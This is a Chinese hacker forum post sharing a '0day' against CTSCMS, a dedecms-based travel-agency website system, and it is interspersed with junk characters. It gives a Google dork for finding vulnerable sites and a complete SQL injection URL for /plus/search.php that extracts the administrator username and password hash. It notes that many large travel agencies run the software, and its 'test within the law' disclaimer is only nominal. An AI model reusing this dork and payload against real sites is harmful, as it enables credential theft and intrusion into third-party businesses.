新年多放点0day,小范围共享!
0 ]( k+ V$ C& D) q: Y7 o1 V5 w8 Q; u中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。; w: T4 }2 Y, P8 `0 v4 Q% k# t
Google:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社
7 g h) l) M8 q8 X+ iPOC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
4 K3 k5 E- U5 \: H: j+ u3 i; X: j
" c3 k3 h9 S5 D2 y% X- ~后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用+ E: E c- \1 O% x
4 L7 [. h( |' |% Z( i L1 q6 w% v9 @4 s
v6 I) s u8 V6 k5 H
2 m) j K$ L& X6 s0 B+ B+ s0 g' d
, ~1 f" }& {* @9 w+ B很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....
; X6 z+ X& z3 H1 r& \' \* ?% f
o. A/ I% R- }5 {/ S }, O, J8 W |